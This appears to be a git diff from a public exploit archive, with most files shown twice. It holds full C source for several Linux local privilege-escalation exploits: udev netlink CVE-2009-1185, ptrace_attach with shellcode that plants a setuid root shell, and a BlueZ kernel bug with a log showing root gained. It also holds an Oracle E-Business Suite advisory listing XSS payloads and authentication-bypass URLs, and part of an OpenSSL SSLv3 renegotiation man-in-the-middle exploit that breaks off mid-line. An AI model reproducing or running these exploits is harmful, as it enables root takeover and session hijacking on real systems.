#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
int
main(int argc, char **argv)
{
int sock;
char *mp, *err;
char message[4096];
struct stat st;
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
if (argc < 2) {
err = "Pass the udevd netlink PID as an argument";
printf("[-] Error: %s\n", err);
exit(1);
}
if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&
(stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {
err = "Required 95-udev-late.rules not found";
printf("[-] Error: %s\n", err);
exit(1);
}
if (stat("/tmp/run", &st) == -1) {
err = "/tmp/run does not exist, please create it";
printf("[-] Error: %s\n", err);
exit(1);
}
system("chmod +x /tmp/run");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "remove@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}
// milw0rm.com [2009-04-30]
/*
* cve-2009-1185.c
*
* udev < 141 Local Privilege Escalation Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
*
* udev before 1.4.1 does not verify whether a NETLINK message originates
* from kernel space, which allows local users to gain privileges by sending
* a NETLINK message from user space.
*
* Notes:
*
* An alternate version of kcope's exploit. This exploit leverages the
* 95-udev-late.rules functionality that is meant to run arbitrary commands
* when a device is removed. A bit cleaner and reliable as long as your
* distro ships that rule file.
*
* Tested on Gentoo, Intrepid, and Jaunty.
*
* Usage:
*
* Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
* usually is the udevd PID minus 1) as argv[1].
*
* The exploit will execute /tmp/run as root so throw whatever payload you
* want in there.
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
int
main(int argc, char **argv)
{
int sock;
char *mp, *err;
char message[4096];
struct stat st;
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
if (argc < 2) {
err = "Pass the udevd netlink PID as an argument";
printf("[-] Error: %s\n", err);
exit(1);
}
if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&
(stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {
err = "Required 95-udev-late.rules not found";
printf("[-] Error: %s\n", err);
exit(1);
}
if (stat("/tmp/run", &st) == -1) {
err = "/tmp/run does not exist, please create it";
printf("[-] Error: %s\n", err);
exit(1);
}
system("chmod +x /tmp/run");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "remove@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}
// milw0rm.com [2009-04-30]

182
platforms/linux/local/8673.c
View file

@ -1,91 +1,91 @@
/*
ptrace_attach privilege escalation exploit by s0m3b0dy
[*] tested on Gentoo 2.6.29rc1
grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...
email: s0m3b0dy1 (at) gmail.com
*/
#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
unsigned long orig_eax, eip;
unsigned short cs, __cs;
unsigned long eflags, esp;
unsigned short ss, __ss;
};
main()
{
struct user_regs_struct322 regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd"; // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
printf("\n[-] read registers\n");
exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
printf("\n[-] write shellcode\n");
exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}
// milw0rm.com [2009-05-13]
/*
ptrace_attach privilege escalation exploit by s0m3b0dy
[*] tested on Gentoo 2.6.29rc1
grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...
email: s0m3b0dy1 (at) gmail.com
*/
#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
unsigned long orig_eax, eip;
unsigned short cs, __cs;
unsigned long eflags, esp;
unsigned short ss, __ss;
};
main()
{
struct user_regs_struct322 regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd"; // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
printf("\n[-] read registers\n");
exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
printf("\n[-] write shellcode\n");
exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}
// milw0rm.com [2009-05-13]

516
platforms/linux/local/926.c
View file

@ -1,258 +1,258 @@
/*
Due to many responses i've improved the exploit
to cover more systems!
ONG_BAK v0.9 [october 24th 05]
""""""""""""""""""""""""""""""""""""
o universal "shellcode" added
o try to use all possible memory regions
o bugfixes
qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222
-|-bluez local root exploit v.0.9 -by qobaiashi-
|
|- i've found kernel 2.6.11.4-20a-default
|- trampoline is at 0x804869c
|- trying...
|- [ecx: bf8d0000 ]
|- suitable value found!using 0xbf8d0000
|- the time has come to push the button...
sh-3.00# exit
ONG_BAK v0.3 [april 8th 05]
"""""""""""""""""""""""""""""""""
ong_bak now checks the value of ecx and launches
the exploit in case a suitable value has been found!
ONG_BAK v0.1 [april 4th 05]
"""""""""""""""""""""""""""""""""
local root exploit for the bluetooth bug
usage:
the bug is quite stable so you can't realy fuck things up
if you stick to the following:
play around with the negative argument until ecx points to
our data segment:
qobaiashi@voyager:~> ./ong_bak -1002341
-|-local bluez exploit v.0.3 -by qobaiashi-
|
|- i've found kernel 2.6.4-52-default
|- trying...
|- [ecx: 0b8f0f0f ]
qobaiashi@voyager:~> ./ong_bak -10023411
-|-local bluez exploit v.0.3 -by qobaiashi-
|
|- i've found kernel 2.6.4-52-default
|- trying...
|- [ecx: 0809da40 ]
|- suitable value found!using 0x0809da40
|- the time has come to push the button..
qobaiashi@voyager:~> id
uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users)
qobaiashi@voyager:~>
that's it.
unfortunately it's not yet very practicable..
qobaiashi@u-n-f.com
*/
#include <sys/klog.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <sys/utsname.h>
#include <sys/mman.h>
void usage(char *path);
//===================[ kernel 2.6* privilege elevator ]===============================
//===================[ qobaiashi@u-n-f.com ]===============================
//globals
int uid, gid;
extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"xor %eax, %eax \n"
"mov $0xffffe000, %eax\n"
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $shellcode \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
void set_root(unsigned int *ts)
{
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
ts[0] = ts[1] = ts[4] = ts[5] = 0;
}
void shellcode()
{
system("/bin/sh");
exit(0);
}
//====================================================================================
//====================================================================================
main(int argc, char *argv[])
{
char buf[2048];
int sock, *mod = (int*)buf;
int *linker = 0;
unsigned int arg;
int tmp;
char *check;
struct utsname vers;
gid = getgid();
uid = getuid();
printf("-|-bluez local root exploit v.0.9 -by qobaiashi-\n |\n");
if (uname(&vers) < 0)
printf(" |- couldn't determine kernel version\n");
else
printf(" |- i've found kernel %s\n", vers.release);
printf(" |- trampoline is at %p\n", &load_highlevel);
if (argc < 2)
{
usage(argv[0]);
exit(1);
}
if (argc == 2)
arg = strtoul(argv[1], 0, 0);
if (fork() != 0)//parent watch the Oops
{
//previous Oops printing
usleep(1000);
if ((tmp = klogctl(0x3, buf, 1700)) > -1)
{
check = strstr(buf, "ecx: ");
printf(" |- [%0.14s]\n", check);
check+=5;
*(check+9) = 0x00;*(--check) = 'x';*(--check) = '0';
mod = (unsigned int*)strtoul(check, 0, 0);
//page align FIXME: might be booggy
int *ecx = mod;
mod = (int)mod &~ 0x00000fff;
linker =
mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0);
if(linker == mod)//we could mmap the area
{
printf(" |- suitable value found!using %p\n", mod);
printf(" |- the time has come to push the button... \n");
for (sock = 0;sock <= 1;sock++) //use ecx
*(ecx++) = (int)&load_highlevel; //link to shellcode
}
else
{
printf(" |- could not mmap %p\n", mod);
if( brk((void*)mod+0x200 ) == -1)
{
printf(" |- could not brk to %p\n", mod);
printf(" `-------------------------------\n");
exit(-1);
}
//here we did it
printf(" |- suitable value found!using %p\n", mod);
printf(" |- the time has come to push the button... \n");
for (sock = 0;sock <= 1;sock++) //use ecx
*(ecx++) = (int)&load_highlevel; //link to shellcode
}
if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
exit(1);
}
return 0;
}
if (fork() == 0)//child does the pre-exploit
{
printf(" |- trying...\n");
if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
{
printf(" |- something went w0rng (invalid value)\n");
exit(1);
}
}
exit(0);
}
/*****************\
|** usage **|
\*****************/
void usage(char *path)
{
printf(" |----------------------------\n");
printf(" | usage: %s <negative value> \n", path);
printf(" | tested:\n");
printf(" | SuSE 9.1: -10023411 \n");
printf(" | -41122122 \n");
printf(" | Kernel 2.6.11: -10023 \n");
printf(" | SuSE 9.3: -100222\n");
printf(" | -102901\n");
printf(" `-----------------------\n");
exit(0);
}
// 1st post: milw0rm.com [2005-04-09]
// milw0rm.com [2005-10-26]
/*
Due to many responses i've improved the exploit
to cover more systems!
ONG_BAK v0.9 [october 24th 05]
""""""""""""""""""""""""""""""""""""
o universal "shellcode" added
o try to use all possible memory regions
o bugfixes
qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222
-|-bluez local root exploit v.0.9 -by qobaiashi-
|
|- i've found kernel 2.6.11.4-20a-default
|- trampoline is at 0x804869c
|- trying...
|- [ecx: bf8d0000 ]
|- suitable value found!using 0xbf8d0000
|- the time has come to push the button...
sh-3.00# exit
ONG_BAK v0.3 [april 8th 05]
"""""""""""""""""""""""""""""""""
ong_bak now checks the value of ecx and launches
the exploit in case a suitable value has been found!
ONG_BAK v0.1 [april 4th 05]
"""""""""""""""""""""""""""""""""
local root exploit for the bluetooth bug
usage:
the bug is quite stable so you can't realy fuck things up
if you stick to the following:
play around with the negative argument until ecx points to
our data segment:
qobaiashi@voyager:~> ./ong_bak -1002341
-|-local bluez exploit v.0.3 -by qobaiashi-
|
|- i've found kernel 2.6.4-52-default
|- trying...
|- [ecx: 0b8f0f0f ]
qobaiashi@voyager:~> ./ong_bak -10023411
-|-local bluez exploit v.0.3 -by qobaiashi-
|
|- i've found kernel 2.6.4-52-default
|- trying...
|- [ecx: 0809da40 ]
|- suitable value found!using 0x0809da40
|- the time has come to push the button..
qobaiashi@voyager:~> id
uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users)
qobaiashi@voyager:~>
that's it.
unfortunately it's not yet very practicable..
qobaiashi@u-n-f.com
*/
#include <sys/klog.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <sys/utsname.h>
#include <sys/mman.h>
void usage(char *path);
//===================[ kernel 2.6* privilege elevator ]===============================
//===================[ qobaiashi@u-n-f.com ]===============================
//globals
int uid, gid;
extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"xor %eax, %eax \n"
"mov $0xffffe000, %eax\n"
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $shellcode \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
void set_root(unsigned int *ts)
{
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
ts[0] = ts[1] = ts[4] = ts[5] = 0;
}
void shellcode()
{
system("/bin/sh");
exit(0);
}
//====================================================================================
//====================================================================================
main(int argc, char *argv[])
{
char buf[2048];
int sock, *mod = (int*)buf;
int *linker = 0;
unsigned int arg;
int tmp;
char *check;
struct utsname vers;
gid = getgid();
uid = getuid();
printf("-|-bluez local root exploit v.0.9 -by qobaiashi-\n |\n");
if (uname(&vers) < 0)
printf(" |- couldn't determine kernel version\n");
else
printf(" |- i've found kernel %s\n", vers.release);
printf(" |- trampoline is at %p\n", &load_highlevel);
if (argc < 2)
{
usage(argv[0]);
exit(1);
}
if (argc == 2)
arg = strtoul(argv[1], 0, 0);
if (fork() != 0)//parent watch the Oops
{
//previous Oops printing
usleep(1000);
if ((tmp = klogctl(0x3, buf, 1700)) > -1)
{
check = strstr(buf, "ecx: ");
printf(" |- [%0.14s]\n", check);
check+=5;
*(check+9) = 0x00;*(--check) = 'x';*(--check) = '0';
mod = (unsigned int*)strtoul(check, 0, 0);
//page align FIXME: might be booggy
int *ecx = mod;
mod = (int)mod &~ 0x00000fff;
linker =
mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0);
if(linker == mod)//we could mmap the area
{
printf(" |- suitable value found!using %p\n", mod);
printf(" |- the time has come to push the button... \n");
for (sock = 0;sock <= 1;sock++) //use ecx
*(ecx++) = (int)&load_highlevel; //link to shellcode
}
else
{
printf(" |- could not mmap %p\n", mod);
if( brk((void*)mod+0x200 ) == -1)
{
printf(" |- could not brk to %p\n", mod);
printf(" `-------------------------------\n");
exit(-1);
}
//here we did it
printf(" |- suitable value found!using %p\n", mod);
printf(" |- the time has come to push the button... \n");
for (sock = 0;sock <= 1;sock++) //use ecx
*(ecx++) = (int)&load_highlevel; //link to shellcode
}
if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
exit(1);
}
return 0;
}
if (fork() == 0)//child does the pre-exploit
{
printf(" |- trying...\n");
if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
{
printf(" |- something went w0rng (invalid value)\n");
exit(1);
}
}
exit(0);
}
/*****************\
|** usage **|
\*****************/
void usage(char *path)
{
printf(" |----------------------------\n");
printf(" | usage: %s <negative value> \n", path);
printf(" | tested:\n");
printf(" | SuSE 9.1: -10023411 \n");
printf(" | -41122122 \n");
printf(" | Kernel 2.6.11: -10023 \n");
printf(" | SuSE 9.3: -100222\n");
printf(" | -102901\n");
printf(" `-----------------------\n");
exit(0);
}
// 1st post: milw0rm.com [2005-04-09]
// milw0rm.com [2005-10-26]

5
platforms/linux/remote/30043.txt
View file

@ -6,4 +6,7 @@ An attacker can exploit these issues to crash the affected application, effectiv
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip
http://www.exploit-db.com/sploits/30043.zip
CVE: 2007-2788 & 2007-2789
OSVDB-ID: 36199 & 36200

46
platforms/multiple/remote/33399.txt Executable file
View file

@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/37305/info
Oracle E-Business Suite is prone to multiple authentication-bypass and HTML-injection vulnerabilities.
Attackers could exploit these issues to steal cookie-based authentication credentials, perform unauthorized actions, or bypass certain security restrictions. Other attacks are also possible.
Some of these vulnerabilities may be documented in BID 33177 (Oracle January 2009 Critical Patch Update Multiple Vulnerabilities). Reportedly, the HTML-injection and some authentication-bypass vulnerabilities were addressed in the Oracle January 2009 Critical Patch Update. Full details are not currently available. We will update this BID as more information emerges.
Oracle E-Business Suite 10 and 11 are vulnerable; other versions may also be affected.
Authentication bypass:
http://www.example.com:port/OA_HTML/OA.jsp
http://www.example.com:port/OA_HTML/RF.jsp
http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
http://www.example.com:8888/pls/TEST/oracleconfigure.customize?p_page_id=1
HTML injection:
http://www.example.com:port/pls/[DADName]/icx_define_pages.editpagelist
http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE
It is important to note that our testing has indicated that different versions have different mitigation levels of this vulnerability, requiring, in some situations, utilizing XSS evasion techniques to overcome certain input validation and sanitation mechanisms:
* For earlier versions, injecting a simple <SCRIPT> suffices:
<SCRIPT>alert(<28>XSS')<SCRIPT>
* Some versions limit the permitted characters, and thus require the tester to inset Java-script without utilizing tags, by injecting a script into the text box as follows:
");alert('XSS');//
* Later versions appear to also enforce server-side length restrictions on the vulnerable parameters. As a result, multiple separate injections are required to achieve script execution, such as:
");/*
*/alert/*
*/(/*
*/<2F>XSS'/*
*/);//

421
platforms/multiple/remote/9972.c
View file

@ -1,421 +0,0 @@
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/ssl3.h>
void
fail(const char *proc)
{
perror(proc);
exit(1);
}
void
setup_server
(int *sock, int port)
{
struct sockaddr_in sa;
int s, r, i;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
fail("setup_server:socket");
i = 1;
r = setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i));
if (r == -1)
fail("setup_server:setsockopt(SO_REUSEADDR)");
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = INADDR_ANY;
sa.sin_port = htons(port);
r = bind(s, (struct sockaddr *) &sa, sizeof(sa));
if (r == -1)
fail("setup_server:bind");
r = listen(s, 5);
if (r == -1)
fail("setup_server:listen");
*sock = s;
}
void
do_accept
(int *accepted, int sock)
{
struct sockaddr_in sa;
socklen_t sl;
int s;
sl = sizeof(sa);
s = accept(sock, (struct sockaddr *) &sa, &sl);
if (s == -1)
fail("do_accept:accept");
fprintf(stderr, "accepted %s:%d\n",
inet_ntoa(sa.sin_addr), ntohs(sa.sin_port));
*accepted = s;
}
void
setup_client
(int *sock, in_addr_t ip, int port)
{
struct sockaddr_in sa;
int s, r;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
fail("setup_server:socket");
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = ip;
sa.sin_port = htons(port);
r = connect(s, (struct sockaddr *) &sa, sizeof(sa));
if (r == -1)
fail("setup_client:connect");
*sock = s;
}
int
xread
(int fd, unsigned char *buf, size_t len)
{
int r, rlen;
rlen = 0;
while (len > 0) {
r = read(fd, buf, len);
if (r == 0)
break;
else if (r == -1)
return -1;
buf += r;
len -= r;
rlen += r;
}
return rlen;
}
struct ssl_io_t
{
SSL *ssl;
int fd;
int raw;
};
extern int
ssl3_read_bytes
(SSL *s, int type, unsigned char *buf, int len, int peek);
int
rec_read
(struct ssl_io_t *io, unsigned char *buf)
{
int r, l;
#if 0
fprintf(stderr, "rec read %s\n",
io->raw & 1 ? "raw" : "cooked");
#endif
if (io->raw & 1) {
r = xread(io->fd, buf, 5);
if (r == 0)
return 0;
else if (r != 5)
fail("rec_read:read1");
if (buf[0] != 0x80)
l = (buf[3] << 8) + buf[4];
else /* ssl2 hack */
/* fail("rec_read:ssl2"); */
l = (buf[1]) - 3;
if (l < 0 || l > (1 << 15)) {
errno = EINVAL;
fail("rec_read:reclen");
}
r = xread(io->fd, buf + 5, l);
if (r != l)
fail("rec_read:read2");
l += 5;
return l;
}
else {
r = ssl3_read_bytes(io->ssl, SSL3_RT_HANDSHAKE, buf + 5, 1<<15, 0);
if (r == 0)
return 0;
else if (r < 0) {
if (io->ssl->s3->change_cipher_spec) {
buf[0] = 0x14;
buf[1] = (io->ssl->version >> 8);
buf[2] = (io->ssl->version & 0xff);
buf[3] = 0;
buf[4] = 1;
buf[5] = 1;
io->raw |= 1;
io->ssl->s3->change_cipher_spec = 0;
return 6;
}
fail("rec_read:ssl3_read_bytes");
}
l = r;
buf[0] = io->ssl->s3->rrec.type;
buf[1] = (io->ssl->version >> 8);
buf[2] = (io->ssl->version & 0xff);
buf[3] = (l >> 8);
buf[4] = (l & 0xff);
return l + 5;
}
}
extern int
ssl3_write_bytes
(SSL *s, int type, const void *buf_, int len);
void
rec_write
(struct ssl_io_t *io, unsigned char *buf, size_t len)
{
int r;
#if 0
fprintf(stderr, "rec write %s\n",
io->raw & 2 ? "raw" : "cooked");
#endif
if (io->raw & 2) {
r = write(io->fd, buf, len);
if (r != len)
fail("rec_write:write");
}
else {
r = ssl3_write_bytes(io->ssl, buf[0], buf + 5, len - 5);
if (r < 0) {
fail("rec_read:ssl3_write_bytes");
}
if (buf[0] == 0x14) {
io->raw |= 2;
}
}
}
void
ssl_io
(struct ssl_io_t *assl, struct ssl_io_t *cssl)
{
struct ssl_io_t *ssls[2];
int maxfd, active;
int i, r, l;
fd_set rfd;
unsigned char buf[1 << 16];
ssls[0] = assl;
ssls[1] = cssl;
active = 3;
maxfd = 0;
for (i = 0; i < 2; i++)
if (ssls[i]->fd >= maxfd)
maxfd = ssls[i]->fd + 1;
while (active) {
FD_ZERO(&rfd);
for (i = 0; i < 2; i++)
if (active & (1 << i))
FD_SET(ssls[i]->fd, &rfd);
r = select(maxfd, &rfd, NULL, NULL, NULL);
if (r == -1)
fail("rec_io:select");
for (i = 0; i < 2; i++) {
if (active & (1 << i) && FD_ISSET(ssls[i]->fd, &rfd)) {
r = rec_read(ssls[i], buf);
if (r == 0) {
shutdown(ssls[i]->fd, SHUT_RD);
shutdown(ssls[1 - i]->fd, SHUT_WR);
active &= ~(1 << i);
continue;
}
l = r;
rec_write(ssls[1 - i], buf, l);
}
}
}
}
void
setup_ssl_ctx
(SSL_CTX **ctx)
{
OpenSSL_add_ssl_algorithms();
SSL_load_error_strings();
*ctx = SSL_CTX_new(SSLv3_client_method());
if (!*ctx)
fail("setup_ssl_ctx:SSL_CTX_new");
}
void
setup_ssl_io
(struct ssl_io_t *io, SSL_CTX *ctx, int sock, int raw)
{
SSL *ssl;
BIO *bio;
ssl = SSL_new(ctx);
if (!ssl)
fail("setup_ssl_ctx:SSL_new");
bio = BIO_new_socket(sock, BIO_NOCLOSE);
if (!bio)
fail("setup_ssl_ctx:BIO_new_socket");
SSL_set_bio(ssl, bio, bio);
SSL_set_connect_state(ssl);
io->ssl = ssl;
io->fd = sock;
io->raw = raw;
}
int
bogus_change_cipher_state
(SSL *ssl, int i)
{
return 0;
}
/* stolen from ssl_locl.h */
typedef struct ssl3_enc_method {
int (*enc)(SSL *, int);
int (*mac)(SSL *, unsigned char *, int);
int (*setup_key_block)(SSL *);
int (*generate_master_secret)(SSL *, unsigned char *, unsigned char *, int);
int (*change_cipher_state)(SSL *, int);
int (*final_finish_mac)(SSL *, EVP_MD_CTX *, EVP_MD_CTX *, const char *, int, unsigned char *);
int finish_mac_length;
int (*cert_verify_mac)(SSL *, EVP_MD_CTX *, unsigned char *);
const char *client_finished_label;
int client_finished_label_len;
const char *server_finished_label;
int server_finished_label_len;
int (*alert_value)(int);
} SSL3_ENC_METHOD;
#define TRICK "GET /ble HTTP/1.0\r\nX-Blah: "
void
hack_ssl
(struct ssl_io_t *assl, struct ssl_io_t *cssl)
{
int r, l;
unsigned char buf[1 << 16];
SSL_METHOD *mth;
r = rec_read(assl, buf);
if (r <= 0)
fail("hack_ssl:rec_read:no i/o");
l = r;
if (buf[0] == 0x16 && buf[1] == 3 &&
(buf[2] == 0 || buf[2] == 1)) {
cssl->raw = 0;
r = SSL_CTX_set_ssl_version
